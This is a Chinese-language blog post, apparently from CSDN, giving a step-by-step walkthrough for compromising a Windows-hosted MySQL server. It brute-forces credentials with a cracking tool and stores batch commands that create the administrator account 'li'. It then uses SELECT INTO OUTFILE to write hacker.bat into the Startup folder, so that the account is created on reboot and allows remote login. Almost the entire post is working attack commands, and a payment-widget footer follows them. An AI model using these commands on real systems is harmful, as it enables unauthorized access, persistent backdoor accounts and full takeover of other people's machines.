攻击基于Windows平台的MySQL系统一例

1.用mysql_pwd_crack.exe工具扫描对方mysql的用户名和密码
mysql_pwd_crack.exe 192.168.1.14 -x 3306 -a

字典文件分别命名为:user.dic  pass.dic
2.登陆对方的mysql(假设已经扫出用户名为为abc、密码为abc)
mysql -h 192.168.1.14 -u abc -p

3.创建数据库

create database aaa;
4.进入数据库

use aaa;

5.在数据库aaa中创建表bbb,字段名为ccc

 
create table bbb(ccc text);

6.在表中插入批处理文件代码
  insert into bbb values(“@echo off”);
  insert into bbb values(“net user li 123456 /add”);
  insert into bbb values(“net user li /active:yes”);
  insert into bbb values(“net localgroup Administrators li /add”);

7.将批处理文件中的代码查询出来,并以批处理文件hacker.bat的格式保存在C:\\Documents and Settings\\Administrator\\「开始」菜单  \\程序\\启动\\目录下
 SELECT * INTO OUTFILE 'C:\\Documents and Settings\\Administrator\\「开始」菜单\\程序\\启动\\hacker.bat'
 FIELDS TERMINATED BY ' '
 ENCLOSED BY ' '
 ESCAPED BY ' '
 LINES TERMINATED BY '\n'
 FROM bbb;

测试结果:当对方重启计算机时,会发现他的计算机系统中会自动生成一个有管理员权限的用户li,并且用它可以远程登陆他的计算机。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值